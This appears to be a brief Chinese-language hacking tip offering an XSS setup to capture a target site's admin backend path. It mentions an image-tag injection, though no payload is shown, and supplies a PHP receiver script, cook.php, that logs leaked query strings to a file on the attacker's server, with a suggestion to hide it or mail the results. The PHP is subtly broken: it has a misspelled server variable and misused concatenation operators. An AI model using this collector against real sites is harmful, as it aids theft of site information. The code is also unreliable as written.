XSS截获网站后台路径脚本
插入圖片Xss:
在你的伺服器上 等待上鉤吧。 保存在當前目錄的 address.txt文檔中。 當然你可以選擇隱藏它 或 Mail 2 Your #mail
cook.php
[code lang="php" start="" highlight=""]
$info = $_SERVER['QUSEY_STRING'];
if ($info) {
$fp = fopen("address.txt"."a");
fwrite($fp.$info."\n");
fclose($fp);
}
?>
[/code]